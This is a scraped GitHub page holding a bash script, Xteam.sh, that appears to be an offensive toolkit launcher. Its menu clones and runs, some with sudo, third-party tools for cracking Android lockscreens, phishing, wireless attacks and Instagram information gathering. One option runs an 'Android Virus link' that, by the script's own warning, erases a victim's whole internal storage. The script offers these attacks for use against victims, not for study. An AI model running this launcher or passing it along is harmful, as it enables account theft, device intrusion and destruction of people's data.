-
Notifications
You must be signed in to change notification settings - Fork 66
/
Xteam.sh
100 lines (84 loc) · 3.49 KB
/
Xteam.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#!/bin/bash
# colour
Black="\033[1;30m" # Black
Red="\033[1;31m" # Red
Green="\033[1;32m" # Green
Yellow="\033[1;33m" # Yellow
Blue="\033[1;34m" # Blue
Purple="\033[1;35m" # Purple
Cyan="\033[1;36m" # Cyan
White="\033[1;37m" # White
clear
apt-get update
apt-get upgrade
apt-get install python
apt-get install python2
clear
echo -e "$Green Created By \e[1;34m"
figlet X TEAM | lolcat
sleep 2.0
echo " "
echo -e "$Red ⫸ Coded by$Yellow xploitstech$Red ⫷\033[0m"
echo -e "$Red ⫸$Red www.cynone.com$Red ⫷\033[0m"
echo " "
echo -e " $Red ||----------------------------$Cyan [features] $Blue ---------------------------||"
echo -e " $Red || ||"
echo -e " $Red || $Purple%=>$Yellow[1️⃣] Insta information gathering$Blue ||"
echo -e " $Red || $Purple%=>️$Yellow[2️⃣] Crack android lockscreen interfaces$Blue ||"
echo -e " $Red || $Purple%=>$Yellow[3️⃣] Phishing hacks$Blue ||"
echo -e " $Red || $Purple%=>$Yellow[4️⃣] Wireless Attacks$Blue ||"
echo -e " $Red || $Purple%=>$Yellow[5️⃣] Android Virus link$Blue ||"
echo -e " $Red || $Purple%=>$Yellow[6️⃣] Update Xteam$Blue ||"
echo -e " $Red || $Purple%=>$Yellow[7️⃣] About Cynone.com$Blue ||"
echo -e " $Red || $Purple%=>$Yellow[8️⃣] exit$Blue ||"
echo -e " $Red || ||"
echo -e " $Red ||---------------------------$Cyan [select option] $Blue -----------------------||"
echo -e " $Blue |---------------------------------------------------------------------|"
echo " "
echo " "
read ch
if [ $ch -eq 1 ];then
cd $HOME
cd Xteam
cd Ig_information_gathering
bash start.sh
exit
elif [ $ch -eq 2 ];then
cd $HOME
git clone https://github.com/tegal1337/CiLocks
cd CiLocks
chmod +x cilocks
sudo ./cilocks
exit
elif [ $ch -eq 3 ];then
git clone git://github.com/htr-tech/zphisher.git
cd zphisher
bash zphisher.sh
exit
elif [ $ch -eq 4 ];then
git clone --depth 1 https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
sudo bash airgeddon.sh
exit
elif [ $ch -eq 5 ];then
cd $HOME
cd Xteam
cd infect
echo -e "\e[1;34m This Virus Formates (Deletes) the victims Full Internal Storage So think and Use."
bash infect.sh
exit
elif [ $ch -eq 6 ];then
echo -e "\e[1;34m Downloading Latest Files..."
cd $HOME
rm -rf Xteam
git clone https://github.com/xploitstech/Xteam
cd Xteam
bash Xteam.sh
exit
elif [ $ch -eq 7 ];then
echo -e "\e[1;34m Downloading Latest Files..."
else
echo -e "\e[4;32m Invalid Input !!! \e[0m"
pause
fi
done